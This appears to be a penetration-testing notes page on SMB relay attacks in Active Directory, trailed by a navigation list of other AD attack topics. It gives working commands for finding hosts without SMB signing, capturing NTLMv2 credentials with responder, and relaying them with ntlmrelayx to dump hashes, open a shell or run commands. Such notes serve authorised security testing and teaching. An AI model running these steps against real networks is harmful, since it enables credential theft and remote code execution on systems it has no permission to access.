SMB Relay (Internal/External)

Note: Network Environment

This attack works best in a flat network. However, as long as the attacker machine and target(s) are routeable and no firewalls are blocking required ports, it could work across network segments.

What is SMB Relay?

A man-in-the-middle may receive user NTLM authentication credentials, which, once received, can be relayed to other host(s) on the network in an attempt to authenticate as said user(s).

What's the Flaw?

Many Active Directory networks are configured in such a way that SMB message signing is not enabled -- which is the default configuration on client machines. It is always enabled on servers and domain controllers.

sudo nmap --script=smb2-security-mode -p445 target(s)

How is it Exploited?

Using a tool like responder, the attacker can listen for SMB client requests. If a client connects, the attacker will receive the user's NTLMv2 authentication credential -- username and NTMLv2 hash in cleartext.

Upon receiving the NTLMv2 authentication credential, the attacker can use a tool like ntlmrelayx.py to relay that credential to other host(s) on the network and attempt to authenticate as this user -- assuming this user is privileged to access resources on the other machines.

The Attack

Part 1: Responder

Various responder modules can be enabled/disabled in the configuration file: /etc/responder/Responder.conf

Disable HTTP server (hosted by ntlmrelay)
Disable SMB server (hosted by ntlmrelay)

sudo responder -I <interface-name> -dvw

Part 2a: ntlmrelayx (dump hashes)

sudo ntlmrelayx.py -tf <targets-file> -smb2support

Part 2b: ntlmrelayx (bind shell)

Opens an SMB shell that is forwared through a socket on localhost

sudo ntlmrelayx.py -tf <targets-file> -smb2support -i

Once the shell is established, just use netcat to connect to the socket

nc 127.0.0.1 <port>

Then, we can issue commands to the SMB shell established on the target

Part 2c: ntlmrelayx (RCE)

sudo ntlmrelayx.py -tf <targets-file> -smb2support -c 'command'

Enumerating Hosts and Identifying the Domain Controllers

LLMNR Poisoning (Internal)

SMB Relay (Internal/External)

IPv6 DNS Spoofing (Internal)

NULL Session Enumeration (Internal/External)

Using Faketime for Ad-Hoc Kerberos Authentication

Kerberos Pre-Auth Username Enumeration

AS-REP Roasting (Internal/External)

Passback Attacks (Internal/External)

PrintNightmare (Internal/External)

NTLM Credential Stuffing (Internal/External)

PowerShell AD Module on Any Domain Host as Any User

Dumping DNS Records with adidnsdump

CrackMapExec

PowerView

BloodHound

Remote Bloodhound

LdapDomainDump

LdapSearch

Enum4Linux

GetADUsers.py

GetUserSPNs.py

Manual Enumeration

Extracting Kerberos AS-REQ Pre-Auth Hashes from PCAPs

Mimikatz

Dumping Passwords from Windows Credential Manager

Dumping Hashes without Mimikatz

Impacket-Addcomputer

DCSync

Pass the Password

Pass the Hash

Pass the Ticket

Pass the Key

Password & Credential Brute Force

Token Impersonation

Spawn Processes as Other Users

Kerberoasting

Group Policy Preferences (GPP)

PrintNightmare

ZeroLogon

xfreerdp

SMB Relay (Internal/External)

Note: Network Environment

What is SMB Relay?

What's the Flaw?

Detecting SMB Signing Mode

How is it Exploited?

The Attack

Part 1: Responder

Part 2a: ntlmrelayx (dump hashes)

Part 2b: ntlmrelayx (bind shell)

Part 2c: ntlmrelayx (RCE)